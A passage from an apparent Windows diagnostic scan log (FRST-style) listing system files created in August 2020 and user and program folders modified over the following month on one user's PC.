2020-08-12 19:44 - 2020-08-12 19:44 - 000690536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000675040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000675024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000672256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiaservc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671040 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000661816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000593480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000579584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000572200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000568128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000564488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000548352 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000534016 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000522688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000495104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-08-12 19:44 - 2020-08-12 19:44 - 000467968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000463168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000461112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000457016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000435200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DispBroker.Desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000403456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000379704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000369304 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageOverlayServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\sti.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000312832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000307712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000273744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000247856 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000220984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBAUDIO.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000193592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\net1.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000179512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000165176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000152416 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdrsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000133256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000132408 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000127064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdshext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000124512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000104248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000090936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiarpc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cellulardatacapabilityhandler.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acwow64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuthKeyDelegate_From_20190529_To_20200303.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuth1KeyDelegate.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-08-12 19:35 - 2020-07-18 05:07 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-08-12 19:35 - 2020-07-18 04:53 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-09-11 14:24 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-11 14:23 - 2020-03-20 23:49 - 000000000 ____D C:\Users\Milan\AppData\LocalLow\Mozilla
2020-09-11 07:15 - 2020-04-05 22:19 - 000006107 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-09-11 06:46 - 2020-03-21 10:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2020-09-10 20:41 - 2020-04-04 23:09 - 000006115 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-09-10 17:45 - 2020-03-20 23:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-09-10 16:40 - 2020-06-07 10:48 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-09-10 16:40 - 2020-06-07 10:48 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-09-10 08:02 - 2020-04-04 00:12 - 000006119 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-09-10 07:43 - 2020-05-31 14:59 - 000002178 _____ C:\Users\Milan\Desktop\JDownloader 2.lnk
2020-09-10 07:43 - 2020-03-28 17:28 - 000000958 _____ C:\Users\Milan\Desktop\Mockba to Berlin.lnk
2020-09-10 07:43 - 2020-03-21 14:38 - 000001080 _____ C:\Users\Milan\Desktop\SpeedFan.lnk
2020-09-09 20:32 - 2020-04-05 15:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\vlc
2020-09-09 20:32 - 2020-04-03 11:51 - 000006111 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-09-09 08:42 - 2020-04-03 00:55 - 000006106 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-09-09 07:58 - 2020-07-17 10:20 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka
2020-09-08 19:55 - 2020-03-27 09:09 - 000006118 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-09-08 16:01 - 2020-03-30 11:51 - 000004612 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-09-08 16:01 - 2019-03-19 06:56 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-08 16:01 - 2019-03-19 06:56 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-09-08 08:24 - 2020-03-26 21:15 - 000006110 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-09-07 20:23 - 2020-03-26 08:49 - 000006102 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-09-07 07:56 - 2020-03-21 12:54 - 000006102 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-09-06 16:33 - 2020-03-21 12:43 - 000006098 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-09-04 20:52 - 2020-03-21 10:01 - 000006118 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-09-04 20:28 - 2020-08-08 11:31 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (2)
2020-09-03 20:48 - 2020-03-20 23:40 - 000006106 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-09-02 20:13 - 2020-03-21 00:32 - 000006611 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-09-02 20:09 - 2020-03-20 23:29 - 001694640 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-02 20:09 - 2019-03-19 13:55 - 000717182 _____ C:\WINDOWS\system32\perfh005.dat
2020-09-02 20:09 - 2019-03-19 13:55 - 000145262 _____ C:\WINDOWS\system32\perfc005.dat
2020-09-02 20:09 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-09-02 20:05 - 2020-03-20 23:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-09-02 20:04 - 2020-03-20 23:49 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
